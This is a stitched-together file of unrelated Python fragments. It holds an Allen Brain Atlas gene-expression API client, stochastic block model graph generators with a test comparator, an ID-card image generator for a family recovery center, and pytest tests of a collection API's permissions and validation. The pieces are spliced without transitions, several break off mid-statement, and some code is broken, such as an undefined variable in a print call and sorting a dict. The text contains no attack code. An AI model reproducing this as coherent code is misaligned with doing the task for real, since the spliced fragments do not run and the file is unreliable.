<gh_stars>1-10 # -*- coding: utf-8 -*- import pandas as pd import os import sys import json import tqdm # import requests ## if we query xml # import xmltodict from gr_allenFISH_utils import ( check_gene_cached, check_gene_cached_images, check_cache_AtlasImage, # check_cache_AtlasDataFrame, load_cached_gene, load_cached_gene_images, load_cached_atlas_image, download_and_cache, download_and_cache_image, download_and_cache_AtlasImage, download_and_cache_AtlasImage_Annotated, Download_cache_AtlasDataFrame, extractStructureSVG, ) # from brainrender import base_dir from gr_io import request, fail_on_no_connection # from brainrender.actors import Volume from gr_sys_utils import base_dir import pdb class GeneRenderAPI: voxel_size = 200 # um grid_size = [58, 41, 67] # number of voxels along each direction sectionPlaneDict = {1:'coronal',2:'sagittal'} DOWNSAMPLE_FACTOR = 4 QUALITY_FACTOR = 50 aba_mouseBrain_atlas = 'http://api.brain-map.org/api/v2/structure_graph_download/1.json' all_genes_url = ( "http://api.brain-map.org/api/v2/data/query.json?criteria=" + "model::Gene," + "rma::criteria,products[abbreviation$eq'DevMouse']," + "rma::options,[tabular$eq'genes.id','genes.acronym+as+gene_symbol','genes.name+as+gene_name'," + "'genes.entrez_id+as+entrez_gene_id','genes.homologene_id+as+homologene_group_id']," + "[order$eq'genes.acronym']" + "&num_rows=all&start_row=0" ) gene_experiments_url = ( "http://api.brain-map.org/api/v2/data/query.json?criteria=model::SectionDataSet," + "rma::criteria,[failed$eq'false'],products[abbreviation$eq'Mouse'],genes[acronym$eq-GENE_SYMBOL-]" ) ## gridded data download_url = "http://api.brain-map.org/grid_data/download/EXP_ID?include=energy,intensity,density" ## xml query. 
more complex than json # download_url_full = "http://api.brain-map.org/api/v2/data/query.xml?criteria=model::SectionImage,rma::criteria,[data_set_id$eq-GENE_EXP_ID-]" ## section list download_url_full = "http://api.brain-map.org/api/v2/data/query.json?num_rows=all&criteria=model::SectionImage,rma::criteria,[data_set_id$eq-GENE_EXP_ID-]" ## thumbnail settings for nissl download_url_imageNissl_D = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-?downsample=-DOWNSAMPLE_FACTOR-&quality=-QUALITY_FACTOR-" ## thumbnail settings for expression download_url_imageEXP_D = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-?downsample=-DOWNSAMPLE_FACTOR-&quality=-QUALITY_FACTOR-&view=expression" ## section imagedata of Nissl-full-image download_url_imageNissl_F = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-" ## section imagedata of EXPRESSION-full-image download_url_imageEXP_F = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-?&view=expression" ##For each Structure in the input list, locate the closest image and (x,y) location in SectionDataSet 68545324: closed_image = "http://api.brain-map.org/api/v2/structure_to_image/-EXP_ID-.json?structure_ids=-STRUCTURE_ID-" ### Image-to_Atlas ##For Atlas 1 (P56 mouse), find the closest annotated SectionImage and (x,y) location as defined by a seed SectionImage and seed (x,y) location. 
def getAtlasImagesAnnoationList(self, atlasID, GraphicGroupLabel_id=28):
    '''
    Return the AtlasImage ids that carry structure-boundary annotations
    for the given atlas.

    Atlases that have AtlasImages annotated with Structure boundaries,
    and the relevant GraphicGroupLabel ids:
        Adult Mouse, 3D Coronal: Atlas ID 602630314, labels [28]
        Mouse P56, Coronal:      Atlas ID 1,         labels [28, 159226751]
        Mouse P56, Sagittal:     Atlas ID 2,         labels [28, 159226751]

    Parameters
    ----------
    atlasID : int
        Allen atlas id.
    GraphicGroupLabel_id : int, optional
        Annotation layer selector. The default is 28.

    Returns
    -------
    tuple
        (list of int image ids, atlasID, GraphicGroupLabel_id) - the two
        query arguments are echoed back for convenience.
    '''
    template = "http://api.brain-map.org/api/v2/data/query.csv?criteria=model::AtlasImage,rma::criteria,atlas_data_set(atlases[id$eq-ATLAS_ID-]),graphic_objects(graphic_group_label[id$eq-GRIPHIC_GROUP_LABEL_ID-]),rma::options[tabular$eq'sub_images.id'][order$eq'sub_images.id']&num_rows=all&start_row=0"
    query = template.replace("-ATLAS_ID-", str(atlasID))
    query = query.replace("-GRIPHIC_GROUP_LABEL_ID-", str(GraphicGroupLabel_id))
    # First whitespace-separated token is the CSV header; the rest are ids.
    raw_tokens = request(query).content.decode().split()[1:]
    image_ids = [int(token) for token in raw_tokens]
    return image_ids, atlasID, GraphicGroupLabel_id
def getAtlasStructureDataFrame(self, atlasID, GraphicGroupLabel_id=28, use_cache=True):
    '''
    Build (or load from cache) a dataframe of SVG structure annotations
    for every annotated AtlasImage of the given atlas.

    Parameters
    ----------
    atlasID : int
        Allen atlas id.
    GraphicGroupLabel_id : int, optional
        Annotation layer to download. The default is 28.
    use_cache : bool, optional
        When True and a pickled dataframe exists, load it instead of
        re-downloading every image.

    Returns
    -------
    pandas.DataFrame
        Concatenation of the per-image annotation dataframes.
    '''
    df_name = os.path.join(self.mouseAtlas_cache,
                           'atlas_ID_' + str(atlasID) + '.pkl')
    if use_cache and os.path.exists(df_name):
        print('Loading atlas dataframe from cache!')
        return pd.read_pickle(df_name)

    # BUG FIX: GraphicGroupLabel_id used to be hard-coded to 28 here,
    # silently ignoring the caller's argument.
    atlasImageList, atlasID, GraphicGroupLabel_id = \
        self.getAtlasImagesAnnoationList(
            atlasID, GraphicGroupLabel_id=GraphicGroupLabel_id)

    url_template = "http://api.brain-map.org/api/v2/svg_download/-ALLAS_IMAGE_ID-?groups=-GRIPHIC_GROUP_LABEL_ID-"
    frames = []
    for j in atlasImageList:
        print(f'image {j}')
        # BUG FIX: the old code overwrote the template in-place
        # (url = url.replace(...)), so from the second iteration on the
        # placeholders were gone and every request re-fetched the first
        # image.  Build each URL from the pristine template instead.
        url = url_template.replace(
            "-ALLAS_IMAGE_ID-", str(j)).replace(
            "-GRIPHIC_GROUP_LABEL_ID-", str(GraphicGroupLabel_id))
        frames.append(
            Download_cache_AtlasDataFrame(url, j, atlasID,
                                          GraphicGroupLabel_id))
    atlas_df = pd.concat(frames)
    atlas_df.to_pickle(df_name)
    return atlas_df
def getAtlasBoundaryImage(self, atlasImageID, atlasID, GraphicGroupLabel_id=28):
    '''
    Return the cached SVG of structure-boundary annotations for an
    AtlasImage, downloading and caching it first when it is missing.

    GraphicGroupLabels reference:
    https://help.brain-map.org/display/api/Atlas+Drawings+and+Ontologies
        Mouse P56, Coronal:  Atlas ID 1, GraphicGroupLabels [28, 159226751]
        Mouse P56, Sagittal: Atlas ID 2, GraphicGroupLabels [28, 159226751]

    Parameters
    ----------
    atlasImageID : int
        AtlasImage id whose boundary drawing is requested.
    atlasID : int
        Allen atlas id the image belongs to.
    GraphicGroupLabel_id : int, optional
        Annotation layer to download. The default is 28.

    Returns
    -------
    Path of the cached SVG file, as produced by load_cached_atlas_image.
    '''
    cached = check_cache_AtlasImage(self.mouseAtlas_cache, atlasImageID,
                                    atlasID, GraphicGroupLabel_id)
    if not cached:
        # Not cached yet: fetch the SVG from the Allen API first.
        svg_url = "http://api.brain-map.org/api/v2/svg_download/-ALLAS_IMAGE_ID-?groups=-GRIPHIC_GROUP_LABEL_ID-"
        svg_url = svg_url.replace("-ALLAS_IMAGE_ID-", str(atlasImageID))
        svg_url = svg_url.replace("-GRIPHIC_GROUP_LABEL_ID-",
                                  str(GraphicGroupLabel_id))
        download_and_cache_AtlasImage(svg_url, self.mouseAtlas_cache,
                                      atlasImageID, atlasID,
                                      GraphicGroupLabel_id)
    return load_cached_atlas_image(self.mouseAtlas_cache, atlasImageID,
                                   atlasID, GraphicGroupLabel_id)
def synImageToAtlas(self, atlasID, imageID, seedLocation):
    '''
    Image-to-atlas synchronisation: map a seed (x, y) pixel location on a
    SectionImage to the closest position in the given atlas.

    Parameters
    ----------
    atlasID : int
        Target atlas id.
    imageID : int
        SectionImage id the seed location refers to.
    seedLocation : sequence of two values
        (x, y) pixel coordinates on the seed image.

    Returns
    -------
    dict or list
        The "image_sync" payload of the API response, or [] when the
        request fails or the response lacks the expected keys.
    '''
    baseUrl = "http://api.brain-map.org/api/v2/image_to_atlas/-SECTION_IMAGE_ID-.json?x=-X-&y=-Y-&atlas_id=-ATLAS_ID-"
    url = baseUrl.replace("-ATLAS_ID-", str(atlasID)).replace(
        "-X-", str(seedLocation[0])).replace("-Y-", str(seedLocation[1]))
    url = url.replace("-SECTION_IMAGE_ID-", str(imageID))
    try:
        # Only the network call / JSON parsing can legitimately fail here;
        # the string formatting above is kept outside the try so genuine
        # programmer errors (e.g. a malformed seedLocation) surface.
        return request(url).json()["msg"]["image_sync"]
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt / SystemExit.  Keep the best-effort contract
        # of returning [] on any request/parse failure.
        return []
json.dump(aba_json, outfile) root = []; out = []; aba_df = pd.DataFrame(self.flattenNestedJson(aba_json, root, out)) return aba_df def flattenNestedJson(self, njs, root, out): """ Flatten a nested json file Parameters ---------- njs : TYPE: nest json root : TYPE: [] DESCRIPTION. out : TYPE:[] output dictionary. Returns ------- out : TYPE: list output dictionary. """ for d in njs: if d['children'] == []: out.append(d) else: self.flattenNestedJson(d['children'], d, out) return out @fail_on_no_connection def get_all_genes(self): """ Download metadata about all the genes available in the Allen gene expression dataset """ res = request(self.all_genes_url) return pd.DataFrame(res.json()["msg"]) def get_gene_id_by_name(self, gene_name): self.gene_name = self.gene_name or gene_name if self.genes is None: self.genes = self.get_all_genes() if gene_name not in self.genes.gene_symbol.values: print( f"Gene name {gene_name} doesnt appear in the genes dataset, nothing to return\n" + "You can search for you gene here: https://mouse.brain-map.org/" ) return None else: return int( self.genes.loc[self.genes.gene_symbol == gene_name].id.values[ 0 ] ) def get_gene_symbol_by_id(self, gene_id): if self.genes is None: self.genes = self.get_all_genes() return self.genes.loc[ self.genes.id == str(gene_id) ].gene_symbol.values[0] @fail_on_no_connection def get_gene_experiments(self, gene): """ Given a gene_symbol it returns the list of ISH experiments for this gene as grided data :param gene_symbol: str """ url = self.gene_experiments_url.replace("-GENE_SYMBOL-", gene) data = request(url).json()["msg"] if not len(data): print(f"No experiment found for gene {gene}") return None else: return [d["id"] for d in data] @fail_on_no_connection def get_gene_experiments2(self, gene): """ Given a gene_symbol it returns the list of ISH experiments for this gene and full metaData :param gene_symbol: str """ url = self.gene_experiments_url.replace("-GENE_SYMBOL-", gene) try: data = 
request(url).json()["msg"] except: print('API not responding for url: ', url) return if not len(data): print(f"No experiment found for gene {gene}") return None, None else: try: ## may fail and return internet error! return [d["id"] for d in data], data except: return None, None @fail_on_no_connection def get_gene_experiments_imageList(self, geneExpID): """ Given a gene_experiment ID it returns the list of ISH imageIDs for this experiment :param geneExpID: str """ url = self.download_url_full.replace("-GENE_EXP_ID-", str(geneExpID)) # dict_data = xmltodict.parse(requests.get(url)) ## for xml query data = request(url).json()["msg"] if not len(data): print(f"No experiment found for gene {gene}") return None else: # nImages = int(dict_data['Response']['@total_rows']) # section_image = dict_data['Response']['section-images']['section-image'] ## list of OrderDict # return section_image # nImages = len(data) imgdict = sorted({img['id']:img['section_number'] for img in data}) imgIdx = {img['id']:idx for idx,img in enumerate(data)} sorted_data =[data[imgIdx[j]] for
def get_all_test_cases(self, include_directed=True, include_int_weighted=True):
    """
    Collect the standard test cases.

    Each entry consists at least of a graph partition; some also carry
    the known number of blocks and the ground-truth node-to-block mapping.

    Parameters
    ----------
    include_directed : bool, optional
        Also generate directed planted-partition networks (default True).
    include_int_weighted : bool, optional
        Accepted for interface compatibility; the cases produced here do
        not use it.
    """
    cases = list(self.get_karate_network())
    cases += self.get_planted_partition(False)
    if include_directed:
        cases += self.get_planted_partition(True)
    return cases
def get_planted_partition(self, directed, number_of_instances_per_combination=5):
    """
    Build planted-partition test networks over a grid of parameters.

    Sweeps inter-block probability p_out in {0.1..0.7}, intra-block
    probability p_in in {p_out+0.1 .. 1.0} and group sizes 2..10 (even),
    generating several seeded instances per combination.

    Parameters
    ----------
    directed : bool
        Generate directed graphs.
    number_of_instances_per_combination : int, optional
        Seeded instances per (p_in, p_out, size) combination (default 5).

    Returns
    -------
    list of (partition, number_of_blocks, real_partition) tuples.
    """
    cases = []
    for p_out in range(1, 8):
        # Intra-block probability must exceed the inter-block one.
        for p_in in range(p_out + 1, 11):
            for group_size in range(2, 11, 2):
                generator = PlantedPartitionGenerator(
                    4, group_size, float(p_in) / 10, float(p_out) / 10)
                for instance in range(number_of_instances_per_combination):
                    graph, block_count, truth = generator.generate(
                        directed, self.STANDARD_SEED + instance)
                    cases.append(
                        (self.partition_class(graph), block_count, truth))
    return cases
def _generate_fixed(self, directed):
    """
    Generate a graph by distributing a fixed number of edges between
    randomly chosen block participants.

    Parameters
    ----------
    directed : bool
        Build a nx.DiGraph instead of an undirected nx.Graph.

    Returns
    -------
    (graph, number_of_blocks, real_partition)
        real_partition maps node index -> block index.

    Raises
    ------
    ValueError
        When the demanded edge count between two blocks exceeds the
        number of distinct node pairs available.
    """
    if directed:
        graph = nx.DiGraph()
    else:
        graph = nx.Graph()
    # initiate data structure for sampling and add all nodes to the graph
    block_info = self._create_block_info(graph)

    # Ground-truth partition: node index -> block index.
    # BUG FIX: the old loop iterated `for n in self._nodes_per_block[block]`
    # over an int (TypeError at runtime) and stored one-element lists
    # ([block]) where every other generator stores plain block indices.
    real_partition = {}
    counter = 0
    for block, number_of_nodes in enumerate(self._nodes_per_block):
        for _ in range(number_of_nodes):
            real_partition[counter] = block
            counter += 1

    # Sample every block->block combination and distribute the demanded
    # number of edges by choosing two random endpoints per edge.
    for from_block in range(self._B):
        for to_block in range(self._B):
            # short way in undirected case: only the upper triangle once
            if not directed and to_block > from_block:
                break
            demanded = self._edge_matrix[from_block][to_block]
            # Sanity check: the demand must fit into the number of
            # distinct node pairs between the two blocks.
            if (directed or from_block != to_block) \
                    and demanded > self._nodes_per_block[from_block] * \
                    self._nodes_per_block[to_block]:
                raise ValueError(
                    "Too many edges demanded. \nDemanded numeber: "
                    + str(demanded)
                    + "\npossible edges "
                    + str(self._nodes_per_block[from_block]
                          * self._nodes_per_block[to_block])
                    + "\nbetween blocks " + str(from_block)
                    + "->" + str(to_block))
            elif not directed and from_block == to_block \
                    and demanded > self._nodes_per_block[from_block] * \
                    (self._nodes_per_block[to_block] + 1) / 2:
                raise ValueError(
                    "Too many edges demanded. \nDemanded numeber: "
                    + str(demanded)
                    + "\npossible edges "
                    + str(self._nodes_per_block[from_block]
                          * (self._nodes_per_block[to_block] + 1) / 2)
                    + "\nbetween blocks " + str(from_block)
                    + "->" + str(to_block))
            # create exactly the demanded number of edges
            for _ in range(demanded):
                while True:
                    from_node = self._get_random_block_element(from_block,
                                                               block_info)
                    to_node = self._get_random_block_element(to_block,
                                                             block_info)
                    # BUG FIX: the original test was inverted - it added
                    # the edge only `if graph.has_edge(...)`, i.e. only
                    # when it already existed, which loops forever on an
                    # empty graph.  Retry only while the sampled pair is
                    # already connected.
                    if not graph.has_edge(from_node, to_node):
                        graph.add_edge(from_node, to_node)
                        break
    return graph, self._B, real_partition
sum(block_distribution) for i, value in enumerate(block_distribution): block_distribution[i] = value * 1.0 / total self._flattened_block_distribution.append(block_distribution) nodes_per_block.append(len(block_distribution)) # call old init method to do the rest super(SBMGeneratorDegreeCorrected, self).__init__( number_of_blocks, nodes_per_block, edge_matrix, type_of_edge_matrix, is_directed_edge_matrix) def _get_edge_probability(self, node_from, node_to, from_block, to_block): """ In degree corrected case take care of the probability of each node too. """ return self._edge_matrix[from_block][to_block] \ * self._flattened_block_distribution[node_from] \ * self._flattened_block_distribution[node_to] def _create_block_info(self, graph): # add second field for saving the samples node_list = super(SBMGeneratorDegreeCorrected, self)._create_block_info(graph) block_info = [] for nodes in node_list: block_info.append((nodes, [])) return block_info # in degree corrected self reference is needed # pylint: disable=no-self-use def _get_random_block_element(self, block, block_info): """Return random element of a certain block""" nodes, samples = block_info[block] # check if samples is empty if not samples: # draw multiple samples because this should speed up the generation samples.extend(self.random.choice(nodes, size=self._SAMPLE_SIZE, replace=True, p=self._degree_distribution_per_block[block])) return samples.pop() class PlantedPartitionGenerator(SBMGenerator): """Generator for Planted Partition Networks based on SBMGenerator""" def __init__(self, number_of_groups, number_of_vertices_in_each_group, edge_probability_in_group, edge_probability_between_groups): # create nodes per block array nodes_per_block = [number_of_vertices_in_each_group for _ in range(number_of_groups)] edge_matrix = [[edge_probability_between_groups if i != j else edge_probability_in_group for i in range(number_of_groups)] for j in range(number_of_groups)] # call old init method to do the rest 
super(PlantedPartitionGenerator, self).__init__( number_of_groups, nodes_per_block, edge_matrix, self.PROBABILISTIC_EDGES, is_directed_edge_matrix=False) class Comparator(object): """ Execute the different inference algorithm on a given test cases """ def __init__(self, test_cases, inference_algorithms, objective_function): self.test_cases = test_cases self.inference_algorithms = inference_algorithms self.objective_function = objective_function def execute_single_test(self, starting_partition, inference_class): test_partition = starting_partition.copy() inference = inference_class(starting_partition.graph, self.objective_function, test_partition) inference.infer_stochastic_block_model() return test_partition def execute_all_tests(self, repetitions=1, evaluate_only_objective_function=True): evaluated_results = [] partitions = [] for test_case in self.test_cases: if len(test_case) == 3: partition, number_of_blocks, real_partition = test_case result_evaluator = NormalizedMutualInformation(real_partition) elif len(test_case) == 1: partition = test_case[0] result_evaluator = ObjectiveFunctionEvaluator(self.objective_function) number_of_blocks = 8 else: raise ValueError("Too short test case") if evaluate_only_objective_function: result_evaluator = ObjectiveFunctionEvaluator(self.objective_function) for inference_class in self.inference_algorithms: for _ in range(repetitions): partition.random_partition(number_of_blocks) resulting_partition = self.execute_single_test( partition, inference_class) result = result_evaluator.evaluate(resulting_partition) evaluated_results.append(result) partitions.append(resulting_partition)
def create_cardfront(holder_name, holder_id, holder_role, holder_ISS, holder_DOB,
                     holder_gender, holder_pronouns, holder_height, holder_eyecolor,
                     holder_haircolor, quote, holder_pic):
    """Render the front side of an ID card and return it as a PIL Image.

    The holder photo is cropped to the card's photo box, the quote is
    word-wrapped under it, the textual fields are laid out in two columns,
    and a coloured stripe on the left edge encodes the holder's role.

    :param holder_pic: path to the holder's photo; falls back to a bundled
        default image when missing or unreadable
    :return: the edited card template (PIL Image)
    """
    template = Image.open(blankIDCardFront)  # Opens the template of the ID card
    # Photo box corners as (x, y) pixel coordinates, proportional to template size.
    picTopLeft = [int(template.width * (15 / 325)), int(template.height * (60 / 205))]
    picBotRight = [int(template.width * (130 / 325)), int(template.height * (176 / 205))]
    dx = picBotRight[0] - picTopLeft[0]  # photo box width in pixels
    dy = picBotRight[1] - picTopLeft[1]  # photo box height in pixels
    temp_pic = Image.open("./server/idCreator/johndoepic.jpg")  # default photo
    try:
        if exists(holder_pic):
            time.sleep(1)  # NOTE(review): presumably waits for an upload to finish flushing — confirm
            temp_pic = Image.open(holder_pic).convert("RGB")
            # Respect the EXIF orientation flag so phone photos are upright.
            temp_pic = ImageOps.exif_transpose(temp_pic)
        else:
            print("Picture doesn't exist\nCreating ID with default image...")
    except Exception:  # narrowed from bare except: don't swallow KeyboardInterrupt/SystemExit
        print("Invalid Picture Input")
        temp_pic = Image.open("./server/idCreator/johndoepic.jpg")  # reset to default
    cropped_HolderPic = temp_pic
    # Aspect ratio sanity check; only logs, the crop below always runs.
    errorMargin = cropped_HolderPic.width / cropped_HolderPic.height
    if errorMargin < 1 or errorMargin > 2:
        print(errorMargin)
    # NOTE(review): reconstructed from a collapsed source — the crops below are
    # assumed to be at top level (not nested under the aspect-ratio check).
    if cropped_HolderPic.height > cropped_HolderPic.width:
        # Trim top and bottom to make height equal to width.
        cropped_HolderPic = cropped_HolderPic.crop(
            (0, cropped_HolderPic.width / 4,
             cropped_HolderPic.width,
             cropped_HolderPic.height - cropped_HolderPic.width / 4))
    elif cropped_HolderPic.height < cropped_HolderPic.width:
        # Trim left and right to make width equal to height.
        cropped_HolderPic = cropped_HolderPic.crop(
            (cropped_HolderPic.height / 4, 0,
             cropped_HolderPic.width - cropped_HolderPic.height / 4,
             cropped_HolderPic.height))
    # Resize the picture to the photo box and paste it in place.
    id_pic = cropped_HolderPic.resize((dx, dy), Image.ANTIALIAS)
    template.paste(id_pic, (picTopLeft[0], picTopLeft[1], picBotRight[0], picBotRight[1]))
    draw = ImageDraw.Draw(template)  # Draw on the new template.
    # Small font for the quote line at the bottom of the card.
    font = ImageFont.truetype(fontFile, int(template.height * (9 / 205)))
    # Greedy word-wrap of the quote at roughly maxCharperLine characters.
    maxCharperLine = 69
    count = 0
    newquote = ""
    words = str.split(quote, " ")
    for word in words:
        count += len(word)
        if count > maxCharperLine:
            newquote += "\n"
            count = 0
        newquote += word + " "
    draw.text((int(template.width * (15 / 325)), int(template.height * (180 / 205))),
              newquote, fill='black', font=font)
    # Larger font for the card's data fields.
    font = ImageFont.truetype(fontFile, int(template.height * (12 / 205)))
    lstCardInfo = [holder_name,                        # The holder name
                   holder_id,                          # The holder's id
                   holder_role,                        # The holder's role
                   "ISS: " + holder_ISS,               # The issue date of the ID
                   "DOB: " + holder_DOB,               # The holder's date of birth
                   "GENDER: " + holder_gender,         # The holder's gender
                   "PRONOUNS: " + holder_pronouns,     # The holder's pronouns
                   "HGT: " + holder_height,            # The holder's height
                   "EYES: " + holder_eyecolor,         # The holder's eye color
                   "HAIR: " + holder_haircolor]        # The holder's hair color
    coordX_cardInfo = int(template.width * (140 / 325))       # x of column 1 of the card info
    coordY_cardInfo_start = int(template.height * (60 / 205))  # starting y for the card info
    coordY_cardInfo_inc = int(template.height * (17 / 205))    # spacing between lines of text
    # Entries equal to any of these are fields whose value was left blank and
    # must not be drawn (label prefix with empty value, or empty string).
    lstCardBlanks = ["",
                     "ISS: ",
                     "DOB: ",
                     "GENDER: ",
                     "PRONOUNS: ",
                     "HGT: ",
                     "EYES: ",
                     "HAIR: "]
    coordY_cardInfo_current = coordY_cardInfo_start
    for ele in lstCardInfo:
        # Idiomatic membership test replaces the original manual search loop.
        if ele not in lstCardBlanks:
            draw.text((coordX_cardInfo, coordY_cardInfo_current), ele,
                      fill='black', font=font)  # write one line of card info
            coordY_cardInfo_current += coordY_cardInfo_inc  # advance to the next line
            # After 8 drawn lines wrap into the second column.
            if coordY_cardInfo_current >= coordY_cardInfo_start + 7 * coordY_cardInfo_inc:
                coordX_cardInfo = int(template.width * (230 / 325))
                coordY_cardInfo_current = int(template.height * (94 / 205))
    # Role stripe colour on the left edge of the card.
    myFill = "#FFFFFF"  # Color fill initially white
    if holder_role == "Patient":
        myFill = "#FE6100"  # Orange
    elif holder_role == "Alumni":
        myFill = "#DC267F"  # Pink
    elif holder_role == "Employee":
        myFill = "#648FFF"  # Blue
    elif holder_role == "Admin":
        myFill = "#648FFF"
    elif holder_role == "Volunteer":
        myFill = "#785EF0"  # Purple
    else:
        print("Invalid Role")
    # Draws the rectangle to indicate which role the user is.
    draw.rectangle([(0, 0), (int(template.width * (12 / 325)), int(template.height))],
                   fill=myFill)
    return template  # Returns the edited card
template.height*(122/205)] # Specifies the bottom right coordinate of the QR code dx = int(qrBotRight[0]) - int(qrTopLeft[0]) # Find the difference between the right and left points dy = int(qrBotRight[1]) - int(qrTopLeft[1]) # Find the difference between the bottom and top points qr = qrcode.QRCode(error_correction=qrcode.ERROR_CORRECT_H, box_size=15, version=1, border=2) # creates a QR code qr.add_data(id) # Adds the id card's information to the QR code qr.make(fit=True) qrimg = qr.make_image(fill_color="black", back_color="white").resize((int(dx), int(dy))) # sets the qrcode's image to white and black pos = (int(qrTopLeft[0]), int(qrTopLeft[1]), int(qrBotRight[0]), int(qrBotRight[1])) # places the qr code's position to the points qrTopLeft & qrBotRight template.paste(qrimg, pos) # pastes the qr code's image on the id card draw = ImageDraw.Draw(template) # Draw the new template. text_Lost = "If lost return to:\n 2942 W Lake Street\n Chicago, IL, 60612\nor Call:\n (773)940-2960\nduring normal business hours." text_HIPAA = "Above and Beyond Family Recovery Center presents this\ninformation as it is recorded in our Electronic Health Record\nHIPAA Compliant Federally Mandated Licensing Requirement\nand bears no responsibility as to any accuracy of content. Call\n773.690.2960 for further assistance during normal business\nhours." 
def randomQuote():
    """Return a random quote suitable for the front of an ID card.

    The candidate list was provided by the design team and every entry fits
    on the card. The first entry is the empty string, so roughly one card in
    ten carries no quote at all.
    """
    # list of quotes provided by the design team that would fit on the ID card
    lst_quote = ["",
                 "“Insanity is doing the same thing, over and over again, but expecting different results.” ―Narcotics Anonymous",
                 "“It's not recovery that is painful; our resistance to it is what hurts.” ―Narcotics Anonymous, Living Clean: The Journey Continues",
                 "“By keeping an open mind, sooner or later, we find the help we need.” ―Narcotics Anonymous Fellowship, Narcotics Anonymous",
                 "“We may not have it all together, but together we can have it all!” -Wookiefoot",
                 "“Success consists of going from failure to failure without loss of enthusiasm.” -<NAME>",
                 "“Somebody has to start. Somebody has to step forward and do what is right, because it is right.” -Kaladin, in The Way of Kings by <NAME>",
                 "“I am an immigrant to reality.” -Author unknown",
                 "“The world is not the problem! it's how we see it” -Author unknown",
                 "“You are the sky. Everything else is just the weather.” -<NAME>"]
    # random.choice is the idiomatic form of lst_quote[random.randint(0, len-1)]
    # and selects uniformly over the same range.
    return random.choice(lst_quote)
"""Tests for collection requests.""" import uuid import requests # avoid pylint errors because of fixtures # pylint: disable = redefined-outer-name, unused-import from helpers import ( TEST_LABEL, USERS, as_user, collection_for_tests, make_request, make_request_all_roles, mdb, random_string, ) import helpers import utils def test_list_collections(mdb): """Request a list of all collections.""" responses = make_request_all_roles("/api/v1/collection", ret_json=True) for response in responses: assert response.code == 200 assert len(response.data["collections"]) == mdb["collections"].count_documents({}) assert set(response.data["collections"][0].keys()) == { "id", "title", "tags", "properties", } def test_add_collection_permissions(): """ Test permissions for adding a collection. * Any user with ``DATA_EDIT`` can add a collection """ indata = {"collection": {"title": "Test add permissions title"}} indata["collection"].update(TEST_LABEL) responses = make_request_all_roles( "/api/v1/collection", method="POST", data=indata, ret_json=True ) for response in responses: if response.role in ("edit", "data", "root"): assert response.code == 200 assert "id" in response.data assert len(response.data["id"]) == 38 elif response.role == "no-login": assert response.code == 401 assert not response.data else: assert response.code == 403 assert not response.data def test_add_collection_data(mdb): """ Test the functionality for adding collections. 
def _assert_add_rejected(responses):
    """Assert that a bad collection-add attempt was rejected for every role.

    Roles with DATA_EDIT (root/edit/data) get 400 (bad input), anonymous
    users get 401, everyone else 403; no payload is returned in any case.
    """
    for response in responses:
        if response.role == "no-login":
            assert response.code == 401
        elif response.role in ("root", "edit", "data"):
            assert response.code == 400
        else:
            assert response.code == 403
        assert not response.data


def test_add_collection_bad():
    """
    Perform bad add collection attempts.

    * no {collection: {...} }
    * empty title
    * no data (no collection)
    * no data
    * list instead of object
    * incorrect field name
    * incorrect editor uuid
    * attempt to set ``_id``
    * bad dataset uuid
    """
    # Each payload is broken in a different way; all must be rejected
    # identically per role. ``None`` means "send no data at all".
    bad_payloads = [
        {"title": "a title"},                          # no {collection: ...} wrapper
        {"collection": {"title": ""}},                 # empty title
        None,                                          # no data at all
        {"collection": {}},                            # empty collection object
        {"collection": []},                            # list instead of object
        {"bad_field": "content", "title": "title"},    # unknown field, no wrapper
        {                                              # editor uuid that does not exist
            "collection": {
                "description": "Test bad add description",
                "editors": [str(uuid.uuid4())],
                "title": "Test bad add title",
            }
        },
    ]
    for indata in bad_payloads:
        if indata is None:
            # Omit the data kwarg entirely to exercise the "no body" path.
            responses = make_request_all_roles("/api/v1/collection", method="POST", ret_json=True)
        else:
            responses = make_request_all_roles(
                "/api/v1/collection", method="POST", data=indata, ret_json=True
            )
        _assert_add_rejected(responses)

    # Attempts below need a session with DATA_EDIT, since they must get past
    # the permission check to reach the field validation.
    session = requests.Session()
    as_user(session, USERS["data"])
    # Setting _id explicitly is forbidden even for an editor.
    indata = {"collection": {"_id": str(uuid.uuid4()), "title": "Test bad add title"}}
    response = make_request(
        session, "/api/v1/collection", method="POST", data=indata, ret_json=True
    )
    assert response.code == 403
    assert not response.data

    # A dataset uuid that does not exist is a validation error.
    indata = {"collection": {"datasets": [str(uuid.uuid4())], "title": "Test bad add title"}}
    response = make_request(
        session, "/api/v1/collection", method="POST", data=indata, ret_json=True
    )
    assert response.code == 400
multiple collections by uuid, one at a time. * Normal collection * Collection as editor; confirm that the user gets the editors field * Collection as DATA_MANAGEMENT; confirm that the user gets the editors field """ session = requests.Session() for _ in range(3): # Get a random collection, use external data structure collection = list(mdb["collections"].aggregate([{"$sample": {"size": 1}}]))[0] utils.prepare_response(collection) proj_owner = mdb["users"].find_one({"_id": {"$in": collection["editors"]}}) collection["id"] = str(collection["id"]) collection["editors"] = [str(entry) for entry in collection["editors"]] collection["datasets"] = [str(entry) for entry in collection["datasets"]] as_user(session, USERS["base"]) response = make_request(session, f'/api/v1/collection/{collection["id"]}') assert response.code == 200 for field in collection: if field == "datasets": for i, ds_uuid in enumerate(collection[field]): assert ds_uuid == response.data["collection"][field][i]["id"] elif field == "editors": continue else: assert collection[field] == response.data["collection"][field] as_user(session, proj_owner["auth_ids"][0]) response = make_request(session, f'/api/v1/collection/{collection["id"]}') assert response.code == 200 for field in collection: if field in ("datasets", "editors"): entries = [entry["id"] for entry in response.data["collection"][field]] assert len(collection[field]) == len(entries) for i, ds_uuid in enumerate(collection[field]): assert ds_uuid in entries else: assert collection[field] == response.data["collection"][field] as_user(session, USERS["root"]) response = make_request(session, f'/api/v1/collection/{collection["id"]}') assert response.code == 200 for field in collection: if field in ("datasets", "editors"): entries = [entry["id"] for entry in response.data["collection"][field]] assert len(collection[field]) == len(entries) for i, ds_uuid in enumerate(collection[field]): assert ds_uuid in entries else: assert collection[field] == 
